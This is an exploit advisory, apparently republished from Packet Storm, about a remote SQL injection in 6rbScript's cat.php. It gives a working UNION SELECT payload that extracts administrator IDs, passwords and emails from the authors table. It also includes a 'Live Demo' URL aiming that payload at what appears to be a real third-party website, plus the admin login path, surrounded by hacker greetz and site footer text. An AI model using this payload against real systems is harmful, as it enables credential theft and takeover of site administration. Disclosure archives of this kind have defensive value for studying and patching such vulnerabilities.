6rbScript suffers from a remote SQL injection vulnerability in cat.php.
ce8d43c9100a61eada891f897ef44a8a2573263195e65efb9424d1dd220f0fd9$___________________________________________________/
$
$ 6rbScript (cat.php) Remote SQL Injection
$
$___________________________________________________/
$ -- K --
$
$ Author:\ Karar_alshami
$
$ Home:\ Google.Com
$
$ email:\ Karar_alshame{aT}Yahoo{d0t}com
$
$
$
$___________________________________________________/
$ -- K --
$
$ script :\ www.6rbscript.com
$
$ Price! :\ 150$
$
$ DorK :\ "Try 2 Find it!"
$___________________________________________________/
Exploit:\
------------
WwW..[localhost].com/script/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--
Live Demo:\
-----------------
http://www.qatarw.com/A/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--
Admin LoGin :\
--------------------
WwW.[localhost].com/admin
____________________________-- Greetz --_________________________________/
$
$ All members 0f Mriraq.com/vb & www.iq-ty.com/vb
$
$ All my frienDs & $ Hussin X $ S_DLA_S Th3 1r4Q1 $ GeNiUs IrAQI $ Fakar ali $
$
$ Bashar $ Iraqhack $ mos_chori
$
$ h3 h3
$______________________________----____________________________________/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed